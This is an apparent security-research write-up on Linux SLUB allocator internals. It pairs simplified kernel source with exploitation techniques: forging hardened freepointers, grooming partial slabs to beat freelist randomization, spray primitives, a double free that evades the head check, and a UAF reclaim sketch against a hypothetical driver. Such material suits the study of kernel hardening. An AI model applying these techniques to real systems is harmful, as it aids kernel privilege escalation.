SLUB Allocator — Architecture Overview
SLUB has been the default kernel heap allocator since Linux 2.6.23 (merged in 2.6.22), replacing SLAB.
It is designed for simplicity, per-CPU performance, and reduced metadata overhead.
Every kernel allocation, from a few bytes up to several pages, passes through this subsystem.
Key Data Structures
/* Simplified field view; see mm/slub.c and its headers for full definitions */

struct kmem_cache {
    unsigned int size;                        /* object + metadata        */
    unsigned int object_size;                 /* usable object size       */
    struct kmem_cache_cpu __percpu *cpu_slab;
    struct kmem_cache_node *node[];           /* one per NUMA node        */
    slab_flags_t flags;
    unsigned int offset;                      /* freepointer offset       */
    unsigned long random;                     /* FREELIST_HARDENED key    */
};

struct kmem_cache_cpu {
    void **freelist;                          /* percpu freelist head     */
    unsigned long tid;                        /* transaction id           */
    struct slab *slab;                        /* active slab (folio)      */
    struct slab *partial;                     /* percpu partial list      */
};

struct slab {                                 /* embedded in struct folio */
    void *freelist;
    unsigned int inuse;
    unsigned int objects;
    struct kmem_cache *slab_cache;
    unsigned int frozen : 1;
};

struct kmem_cache_node {
    struct list_head partial;
    unsigned long nr_partial;
    atomic_long_t nr_slabs;
    spinlock_t list_lock;
};
01 — kmem_cache_create()
Each object type (task_struct, file, inode, dst_entry, etc.) gets its own cache. Caches are created at boot or on module load. This step defines the object geometry, alignment, flags, and the per-CPU setup.
/* mm/slab_common.c */
struct kmem_cache *kmem_cache_create(const char *name,
        unsigned int object_size, unsigned int align,
        slab_flags_t flags,   /* SLAB_HWCACHE_ALIGN | SLAB_PANIC | ... */
        void (*ctor)(void *))
{
    return kmem_cache_create_usercopy(name, object_size, align,
                                      flags, 0, 0, ctor);
}

/* → __kmem_cache_create() → mm/slub.c: kmem_cache_open() */
static int kmem_cache_open(struct kmem_cache *s, slab_flags_t flags)
{
    s->flags = kmem_cache_flags(s->size, flags, s->name);
    set_min_partial(s, ilog2(s->size) / 2);
    set_cpu_partial(s);         /* cpu_partial threshold                */
    init_kmem_cache_nodes(s);   /* alloc kmem_cache_node per NUMA node  */
    alloc_kmem_cache_cpus(s);   /* alloc percpu kmem_cache_cpu          */
    /* s->offset: freepointer offset inside the object */
    /* s->random: XOR key for FREELIST_HARDENED        */
    /* s->oo:     optimal order (slab page order)      */
    return 0;
}
Flags important for security research (a minimal cache-creation sketch follows the list)

SLAB_TYPESAFE_BY_RCU (UAF window)
The slab page is not returned to the buddy allocator after all objects are freed until an RCU grace period has elapsed. Object memory therefore stays valid inside rcu_read_lock().

SLAB_HWCACHE_ALIGN
The object size is rounded up to the L1 cache line (typically 64 bytes). The padding bytes between the end of object_size and size can be exploited via adjacent reads/writes.

SLAB_SANITIZE_BY_RCU (Linux 6.x)
Mitigation: memory is zeroed after free (inside an RCU callback). This breaks UAF techniques that rely on stale data. Enabled on some security-sensitive caches.

SLAB_ACCOUNT
Per-object memory-cgroup accounting. No direct security impact, but usable as an oracle (meminfo leak).
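For orientation, here is a minimal sketch of how a driver might create such a cache. The cache name, the object type (demo_obj), and its field sizes are hypothetical:

/* Hypothetical module snippet: creating a dedicated cache with
 * security-relevant flags. struct demo_obj is illustrative only. */
#include <linux/init.h>
#include <linux/slab.h>

struct demo_obj {                 /* hypothetical object type */
    unsigned long id;
    char payload[56];
};

static struct kmem_cache *demo_cachep;

static int __init demo_cache_init(void)
{
    demo_cachep = kmem_cache_create("demo_obj",
            sizeof(struct demo_obj), 0,
            SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT,  /* flags from the list above */
            NULL);                              /* no constructor            */
    return demo_cachep ? 0 : -ENOMEM;
}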
Freepointer Layout inside the Object (the key to SLUB)
/* The freepointer is stored INSIDE the object itself, at s->offset */
/* Default: s->offset = 0 (start of the object)                     */

/* Without FREELIST_HARDENED (old kernels / debug off): */
next_obj = *(void **)((char *)object + s->offset);

/* With CONFIG_SLAB_FREELIST_HARDENED (common on modern distro kernels): */
static inline void *freelist_ptr_decode(const struct kmem_cache *s,
                                        void *ptr, unsigned long ptr_addr)
{
    return (void *)((unsigned long)ptr ^ s->random ^ ptr_addr);
}
/* Stored value = fp XOR s->random XOR &(object->fp_field)  */
/* To forge: need a leak of s->random + a heap address      */
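Because the encoding is plain XOR arithmetic, the stored word can be computed offline once s->random and the slot address are known. A standalone userspace sketch; every value below is a made-up example:

/* Demo of the triple-XOR math; the key and addresses are fabricated. */
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t cache_random = 0x8c3f2a19d4e6b075ULL; /* leaked s->random      */
    uint64_t slot_addr    = 0xffff888004bf2000ULL; /* free object + offset  */
    uint64_t target       = 0xffffffff82a1d040ULL; /* desired alloc address */

    /* value an attacker would write into the freepointer slot */
    uint64_t stored = target ^ cache_random ^ slot_addr;
    printf("write to freepointer slot: 0x%016llx\n",
           (unsigned long long)stored);

    /* the kernel-side decode reproduces the target */
    uint64_t decoded = stored ^ cache_random ^ slot_addr;
    printf("kernel decodes:            0x%016llx\n",
           (unsigned long long)decoded);
    return 0;
}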
02 — kmem_cache_alloc() / slab_alloc_node()
Two paths: fast (per-CPU freelist, lock-free via cmpxchg_double) and slow (node partial list or a new slab). The fast path is the common case for cached object types.
Fast Path — percpu freelist pop (lock-free)
/* mm/slub.c — slab_alloc_node() fast path (simplified) */
static inline void *slab_alloc_node(struct kmem_cache *s,
                                    gfp_t gfpflags, ...)
{
    struct kmem_cache_cpu *c;
    unsigned long tid;
    void *object, *next;

redo:
    c = raw_cpu_ptr(s->cpu_slab);   /* this CPU's slab descriptor       */
    tid = READ_ONCE(c->tid);        /* transaction id, detects preempt  */
    barrier();                      /* prevent compiler reordering      */

    object = READ_ONCE(c->freelist);
    if (unlikely(!object || !c->slab))
        goto slow;                  /* freelist empty → slow path       */

    next = get_freepointer_safe(s, object);  /* decode XOR freeptr      */

    /*
     * Atomic: if (freelist == object && tid == tid)
     *             freelist = next; tid = next_tid(tid);
     * If preempted between READ_ONCE and the cmpxchg, tid has changed
     * → retry.
     */
    if (unlikely(!this_cpu_cmpxchg_double(
                s->cpu_slab->freelist, s->cpu_slab->tid,
                object, tid,
                next, next_tid(tid)))) {
        note_cmpxchg_failure("slab_alloc", s, tid);
        goto redo;
    }
    return object;                  /* fast! no lock taken */

slow:
    /* node, addr, orig_size elided from the simplified signature above */
    return __slab_alloc(s, gfpflags, node, addr, c, orig_size);
}
Freelist state — before vs. after alloc

Before alloc: cpu_slab->freelist → obj[0] → obj[1] → obj[2] → NULL

    freelist → obj[0]
    obj[0]   fp → obj[1]
    obj[1]   fp → obj[2]
    obj[2]   fp → NULL
    obj[3]   IN USE

After kmem_cache_alloc(): obj[0] is returned, the freelist advances to obj[1]

    freelist → obj[1]
    obj[0]   ALLOC'd
    obj[1]   fp → obj[2]
    obj[2]   fp → NULL
    obj[3]   IN USE
Slow Path — __slab_alloc() decision tree
1
Check c->partial (percpu partial list)
If the active slab is exhausted, take a slab from the percpu partial list. No lock required.
↓
2
Check node->partial (NUMA node, requires spin_lock)
Percpu partial is empty → take from kmem_cache_node->partial. The slab is moved to cpu_slab and the percpu partial list is refilled.
↓
3
allocate_slab() → alloc_pages() → buddy allocator
All partial lists are empty → allocate a fresh slab from the page allocator. This is the step that can be provoked for cross-cache attacks (see the spray sketch below).
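A minimal userspace sketch of forcing step 3 by exhausting a kmalloc cache. It uses msgsnd(), whose message body lands in a kmalloc slab alongside the msg_msg header; the size and count here are illustrative:

/* Exhaust a kmalloc cache (roughly kmalloc-96 with a 48-byte body on
 * x86-64; sizes illustrative) so SLUB must call allocate_slab() and
 * pull fresh pages from the buddy allocator. */
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

struct spray_msg {
    long mtype;
    char mtext[48];   /* body + msg_msg header → target cache */
};

static void exhaust_cache(int count)
{
    struct spray_msg m = { .mtype = 1 };
    int q = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);

    memset(m.mtext, 'A', sizeof(m.mtext));
    for (int i = 0; i < count; i++)
        msgsnd(q, &m, sizeof(m.mtext), IPC_NOWAIT);  /* one alloc each */
}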
CONFIG_SLAB_FREELIST_RANDOM
Heap Spray Mitigation
When a new slab is allocated, the freelist order is Fisher-Yates shuffled via get_random_u32_below(). Randomization applies only to fresh slabs: after free/realloc within the same slab, the order reverts to LIFO (deterministic). Bypass: exhaust the partial slabs, force a new slab allocation, then groom the partial list.
/* mm/slub.c — full slab_alloc_node() with all guards */
static __always_inline void *slab_alloc_node(struct kmem_cache *s,
        struct list_lru *lru, gfp_t gfpflags, int node,
        unsigned long addr, size_t orig_size)
{
    void *object;
    struct kmem_cache_cpu *c;
    struct slab *slab;
    unsigned long tid;
    struct obj_cgroup *objcg = NULL;
    bool init = slab_want_init_on_alloc(gfpflags, s);

    s = slab_pre_alloc_hook(s, lru, &objcg, 1, gfpflags);
    if (!s)
        return NULL;
redo:
    c = raw_cpu_ptr(s->cpu_slab);
    tid = READ_ONCE(c->tid);
    barrier();
    object = READ_ONCE(c->freelist);
    slab = READ_ONCE(c->slab);

    if (unlikely(!object || !slab || !node_match(slab, node))) {
        object = __slab_alloc(s, gfpflags, node, addr, c, orig_size);
        stat(s, ALLOC_SLOWPATH);
    } else {
        void *next = get_freepointer_safe(s, object);
        if (unlikely(!this_cpu_cmpxchg_double(
                    s->cpu_slab->freelist, s->cpu_slab->tid,
                    object, tid,
                    next, next_tid(tid)))) {
            note_cmpxchg_failure("slab_alloc", s, tid);
            goto redo;
        }
        prefetchw(object);
        stat(s, ALLOC_FASTPATH);
    }

    if (unlikely(init) && object)
        memset(object, 0, s->object_size);   /* INIT_ON_ALLOC zeroing */

    slab_post_alloc_hook(s, objcg, gfpflags, 1, &object, init, orig_size);
    return object;
}
03 — Object Lifetime & Slab State Machine
Each slab page traverses a state machine driven by slab->inuse vs slab->objects. Understanding these transitions is fundamental to heap grooming: we can provoke state transitions to control layout.
Object memory layout within a slab page
/* Per-object layout (SLUB, no debug flags):                            */
/*                                                                      */
/* Object offset 0 (while FREED):                                       */
/*   [freepointer / encoded next ptr]  ← s->offset bytes from start     */
/*   [ ....... user data padding .... ]                                 */
/*                                                                      */
/* Object offset 0 (while ALLOCATED):                                   */
/*   [ ....... user data ............ ] ← freeptr overwritten on alloc  */
/*                                                                      */
/* With KASAN:  [ user_data | redzone | kasan_meta ]                    */
/* With DEBUG:  [ red_left | user_data | red_right | padding ]          */
/*                                                                      */
/* The freepointer lives inside the object = SLUB needs no external     */
/* metadata (unlike dlmalloc, which keeps a header/footer per chunk)    */

/* virt_to_slab() — from a pointer to its slab descriptor: */
static inline struct slab *virt_to_slab(const void *addr)
{
    struct folio *folio = virt_to_folio(addr);

    if (!folio_test_slab(folio))
        return NULL;
    return folio_slab(folio);
}
inuse counter semantics
/* slab->inuse   = number of currently allocated objects             */
/* slab->objects = total objects in the slab page (capacity)         */
/*                                                                   */
/* inuse == 0           → EMPTY,   eligible for discard_slab()       */
/* 0 < inuse < objects  → PARTIAL, goes on a partial list            */
/* inuse == objects     → FULL,    off all lists (unreachable)       */
/*                                                                   */
/* slab->frozen (1 bit): the slab is "owned" by a cpu_slab           */
/* while frozen == 1: the free path uses cmpxchg, not the list lock  */
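The three states reduce to a predicate over the two counters. A standalone sketch with simplified stand-in types:

/* Sketch of the slab state predicate; struct fields are simplified
 * stand-ins for the kernel's packed bitfields. */
enum slab_state { SLAB_EMPTY, SLAB_PARTIAL, SLAB_FULL };

struct slab_view {
    unsigned int inuse;     /* currently allocated objects */
    unsigned int objects;   /* capacity of the slab page   */
};

static enum slab_state classify(const struct slab_view *s)
{
    if (s->inuse == 0)
        return SLAB_EMPTY;      /* candidate for discard_slab() */
    if (s->inuse < s->objects)
        return SLAB_PARTIAL;    /* lives on a partial list      */
    return SLAB_FULL;           /* detached from all lists      */
}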
04 — kfree() / kmem_cache_free()
kfree returns the object to the freelist with a LIFO prepend. Fast path if the object belongs to the active cpu_slab (lock-free cmpxchg); slow path for any other slab, which can trigger partial/full transitions.
/* mm/slub.c — do_slab_free() (simplified) */
static void do_slab_free(struct kmem_cache *s, struct slab *slab,
                         void *head, void *tail, int cnt, ...)
{
    struct kmem_cache_cpu *c;
    void *prior;
    unsigned long tid;

redo:
    c = raw_cpu_ptr(s->cpu_slab);
    tid = READ_ONCE(c->tid);
    barrier();

    if (likely(slab == READ_ONCE(c->slab))) {
        /* Fast path: LIFO prepend onto the cpu freelist */
        prior = c->freelist;
        set_freepointer(s, tail, prior);  /* encode: tail->fp = old head */
        if (unlikely(!this_cpu_cmpxchg_double(
                    s->cpu_slab->freelist, s->cpu_slab->tid,
                    prior, tid,
                    head, next_tid(tid)))) {
            goto redo;                    /* preempted, retry */
        }
    } else {
        __slab_free(s, slab, head, tail, cnt, addr);
    }
}

/* __slab_free — the slab is not the active cpu_slab (sketch) */
static void __slab_free(struct kmem_cache *s, struct slab *slab, ...)
{
    unsigned long prior, counters, flags;
    bool was_frozen, was_full;
    struct kmem_cache_node *n;   /* = get_node(s, slab_nid(slab)) */

    /* cmpxchg slab->freelist: old_fp → head (prepend)     */
    prior = slab->counters;
    /* inuse-- is updated via cmpxchg on the counters word */
    was_frozen = (prior & SLAB_FROZEN);
    was_full = (slab->freelist == NULL);  /* full before this free */

    if (slab->inuse == 0 && !was_frozen) {
        /* EMPTY: discard, or keep as partial */
        if (n->nr_partial > s->min_partial)
            goto slab_empty;              /* → __free_pages() */
        add_partial(n, slab, DEACTIVATE_TO_TAIL);
    } else if (was_full) {
        /* FULL → PARTIAL: add to the node partial list */
        add_partial(n, slab, DEACTIVATE_TO_TAIL);
    }
}
LIFO freelist — kfree(obj[1]) visualized

Before: freelist → obj[2] → NULL. obj[0] and obj[1] are allocated.

    freelist → obj[2]
    obj[0]   IN USE
    obj[1]   IN USE
    obj[2]   fp → NULL
    obj[3]   IN USE

After kfree(obj[1]): prepend at the head → LIFO. The next alloc returns obj[1].

    freelist → obj[1]
    obj[0]   IN USE
    obj[1]   fp → obj[2]
    obj[2]   fp → NULL
    obj[3]   IN USE

LIFO semantics: obj[1] is handed out by the next alloc, and the UAF window stays open until the slot is re-allocated.
05 — Freelist Internals & Manipulation
The freelist is a singly-linked list of the free objects within one slab, with the link pointer stored inline inside each object. It is the primary target of heap exploitation, much like tcache/fastbin in glibc, but with stronger hardening in modern kernels.
/* mm/slub.c — freepointer encode/decode */

/* ENCODE — called from set_freepointer(): */
static inline void set_freepointer(struct kmem_cache *s,
                                   void *object, void *fp)
{
    unsigned long freeptr_addr = (unsigned long)object + s->offset;

#ifdef CONFIG_SLAB_FREELIST_HARDENED
    BUG_ON(object == fp);   /* catch an immediate double free */
    *(unsigned long *)freeptr_addr =
        (unsigned long)fp ^ s->random ^ freeptr_addr;
    /* triple XOR: target_fp ^ cache_secret ^ own_addr */
#else
    *(void **)freeptr_addr = fp;   /* no protection */
#endif
}

/* DECODE — get_freepointer(): */
static inline void *get_freepointer(struct kmem_cache *s, void *object)
{
    unsigned long ptr_addr = (unsigned long)object + s->offset;

    return (void *)(READ_ONCE(*(unsigned long *)ptr_addr)
                    ^ s->random ^ ptr_addr);
}

/* BYPASS strategy (if s->random + a heap address are leaked): */
forged_stored_val = (desired_alloc_target)
                  ^ s->random       /* leaked from the kmem_cache struct */
                  ^ freeptr_addr;   /* = object_addr + s->offset         */
/* OOB-write forged_stored_val into the freepointer slot of a free object */
/* alloc 1: returns free_object (normal)                                  */
/* alloc 2: returns desired_alloc_target ← arbitrary-write primitive      */
/* mm/slub.c — shuffle_freelist(), run when a new slab is built (sketch) */
static void shuffle_freelist(struct kmem_cache *s, struct slab *slab)
{
    unsigned int i, j, n = slab->objects;
    void **p;   /* array of the slab's object pointers, built first */

    /* Build the pointer array, then Fisher-Yates shuffle it */
    for (i = n - 1; i > 0; i--) {
        j = get_random_u32_below(i + 1);
        swap(p[i], p[j]);
    }
    /* Freelist order is random PER new slab.                  */
    /* BUT: after free/alloc within the same slab → LIFO again. */
    /* Only fresh slabs are shuffled, never on reuse.           */
}

/* BYPASSING FREELIST_RANDOM — partial slab grooming: */
/* 1. Exhaust all free slots in the existing partial slabs */
spray = kmem_cache_alloc_bulk(cache, GFP_KERNEL, n, objs);
/* 2. Free some of them → create a partial slab we control */
for (i = 0; i < n; i += 2)
    kmem_cache_free(cache, objs[i]);   /* LIFO: last freed = head */
/* 3. The next alloc returns the last-freed object (LIFO, deterministic) */
victim = kmem_cache_alloc(cache, GFP_KERNEL);
/* victim == objs[n-2] → predictable! */
Useful spray primitives (a setxattr sketch follows this list)

msgsnd() — message body lands in kmalloc-{size}, payload arbitrary
sendmsg() + SCM_RIGHTS — sock_fprog allocation
pipe buffer — pipe_buffer struct (write-then-read)
userfaultfd — blocking alloc, controlled timing
setxattr/getxattr — arbitrary kmalloc size + content
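As an example of the last primitive: setxattr() makes the kernel allocate a buffer of a caller-chosen size, copy in user data, and free it when the syscall returns. A sketch; the path and attribute name are illustrative, and the target file must exist:

/* setxattr() as a kmalloc spray primitive: the allocation lands in
 * the kmalloc cache matching `size`, with fully controlled contents
 * for the lifetime of the syscall. */
#include <sys/xattr.h>

static void xattr_spray(const void *payload, size_t size)
{
    /* illustrative path/name; pair with userfaultfd or FUSE to
     * stall the copy and extend the allocation's lifetime */
    setxattr("/tmp/spray", "user.x", payload, size, 0);
}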
/* Double-free detection mechanisms: */

/* 1. FREELIST_HARDENED — BUG_ON(object == fp):                   */
/*    Only catches a free into a slab that is still the cpu_slab  */
/*    AND object == current freelist head.                        */
/*    Does NOT catch every double-free case.                      */

/* 2. KASAN (Kernel Address Sanitizer): */
void kasan_slab_free(struct kmem_cache *cache, void *object, ...)
{
    /* Shadow bytes are set to KASAN_SLAB_FREE.   */
    /* On the second kfree: shadow check → BUG(). */
    if (kasan_report_invalid_free(object, ip, KASAN_REPORT_DOUBLE_FREE))
        BUG();
}

/* 3. Without KASAN/HARDENED (non-debug production kernel):       */
/*    A double free silently corrupts the freelist:               */
/*    obj → obj → obj (cycle) → infinite loop on alloc,           */
/*    OR attacker-controlled if fp was written beforehand.        */

/* 4. INIT_ON_FREE (Linux 5.3+, CONFIG_INIT_ON_FREE_DEFAULT_ON):  */
/*    Zero the object after free → destroys stale data.           */
/*    But: the freepointer is set AFTER zeroing (still valid):    */
memset(object, 0, s->object_size);
set_freepointer(s, object, fp);   /* fp written after the zeroing */
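Since the BUG_ON only compares the freed object against the current freelist head, the classic interleaved double free slips past it. A conceptual kernel-side sketch; the cache and objects are hypothetical:

/* Interleave a second free so the duplicate is never the current
 * head when checked. `cache` is a hypothetical kmem_cache. */
#include <linux/slab.h>

static void double_free_demo(struct kmem_cache *cache)
{
    void *a = kmem_cache_alloc(cache, GFP_KERNEL);
    void *b = kmem_cache_alloc(cache, GFP_KERNEL);
    void *x, *y, *z;

    kmem_cache_free(cache, a);   /* freelist head: a                     */
    kmem_cache_free(cache, b);   /* head: b → a                          */
    kmem_cache_free(cache, a);   /* head: a → b → a — passes the BUG_ON, */
                                 /* because a != b (the current head)    */

    /* the freelist now cycles: allocations repeat the same address */
    x = kmem_cache_alloc(cache, GFP_KERNEL);   /* x == a              */
    y = kmem_cache_alloc(cache, GFP_KERNEL);   /* y == b              */
    z = kmem_cache_alloc(cache, GFP_KERNEL);   /* z == a again (== x) */
}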
06 — Exploitation Primitives via SLUB
Each vulnerability class exploits a different aspect of the allocator lifecycle. Each technique below is listed with its PoC pattern and mitigation context; a reclaim sketch follows the list.
1
Use-After-Free (UAF) Reallocation Attack — UAF
An object is freed but a stale pointer remains reachable. The window between kfree and re-allocation is exploited with a heap spray: force another object into the same slot.
2
Heap Spray & Grooming — Heap Spray
Controlling the heap layout so a victim object sits adjacent to, or overlaps with, attacker-controlled data. Fundamental to all modern kernel exploitation.
3
Cross-Cache Attack (Slab Page Reuse) — Cross-Cache
Force a slab page from cache A back to the buddy allocator, then have it re-allocated as a fresh slab for cache B. Relevant to the bpf_prog_test_run_skb() crash found earlier: slab cross-cache confusion (CWE-763).
4
Freepointer Overwrite (tcache-poisoning analog) — OOB Write
An OOB write into the freelist pointer of a free object → the next allocation returns an arbitrary address. The SLUB equivalent of tcache poisoning in glibc/ptmalloc.
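A minimal userspace sketch of technique 1's reclaim pattern, assuming a hypothetical vulnerable driver at /dev/vuln whose ioctls (VULN_FREE, VULN_USE) stand in for a real bug; the msgsnd() spray matches the primitives listed earlier:

/* Hypothetical UAF reclaim: device path and ioctl numbers are
 * made up to illustrate the free → spray → use sequence. */
#include <fcntl.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define VULN_FREE 0x1337   /* frees the object, keeps a stale pointer */
#define VULN_USE  0x1338   /* dereferences the stale pointer          */

int main(void)
{
    int fd = open("/dev/vuln", O_RDWR);
    int q = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    struct { long mtype; char mtext[48]; } m = { .mtype = 1 };

    memset(m.mtext, 'B', sizeof(m.mtext));   /* fake object contents */

    ioctl(fd, VULN_FREE, 0);                 /* open the UAF window  */

    for (int i = 0; i < 64; i++)             /* reclaim the slot     */
        msgsnd(q, &m, sizeof(m.mtext), IPC_NOWAIT);

    ioctl(fd, VULN_USE, 0);   /* stale pointer now sees our payload  */
    return 0;
}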
Linux 6.x Mitigations Overview
INIT_ON_ALLOC / INIT_ON_FREE
Zero the object on alloc (breaks stale-data-read UAF) and/or on free (breaks UAF data leaks). Can be skipped per call with __GFP_SKIP_ZERO.
SLAB_FREELIST_HARDENED
Triple-XOR encoding of the freepointer. Forging a valid pointer requires leaking s->random plus a heap address. Merged in Linux 4.14 and enabled on most distribution kernels.
SLAB_FREELIST_RANDOM
Fisher-Yates shuffle at new-slab creation. Mitigates sequential spray prediction. Bypass: groom the partial list so the LIFO order becomes predictable.
KASAN / KMSAN / CFI
KASAN: runtime UAF/OOB detection via shadow bytes. KMSAN: uninitialized reads. CFI (clang): validates indirect call targets. Significant performance overhead.
SLAB_SANITIZE_BY_RCU (v6.x)
Zero the object in an RCU callback before re-allocation. Combines with TYPESAFE_BY_RCU for layered UAF protection.
Generic KASLR + FG-KASLR
Randomize the kernel text base, plus per-function granularity with FG-KASLR. Raises the cost of leak primitives. Even the kmem_cache struct layout is randomized.
Several of these parameters are visible at runtime through SLUB's sysfs interface; see the sketch below.
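When CONFIG_SLUB and sysfs are enabled, live cache parameters can be read from /sys/kernel/slab/. A small sketch; the cache name "kmalloc-256" is just an example:

/* Read a SLUB cache's geometry from sysfs. */
#include <stdio.h>

static void show(const char *cache, const char *attr)
{
    char path[256], buf[64];
    FILE *f;

    snprintf(path, sizeof(path), "/sys/kernel/slab/%s/%s", cache, attr);
    f = fopen(path, "r");
    if (f && fgets(buf, sizeof(buf), f))
        printf("%-14s %s", attr, buf);
    if (f)
        fclose(f);
}

int main(void)
{
    show("kmalloc-256", "object_size");    /* usable object size     */
    show("kmalloc-256", "slab_size");      /* size incl. metadata    */
    show("kmalloc-256", "order");          /* slab page order        */
    show("kmalloc-256", "objs_per_slab");  /* capacity per slab page */
    return 0;
}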
/* Reference: mm/slub.c, mm/slab_common.c — Linux 6.x kernel source */
bluedragonsec.com | w1sdom | CVE research: CVE-2026-23416, CVE-2026-30658, CVE-2026-27831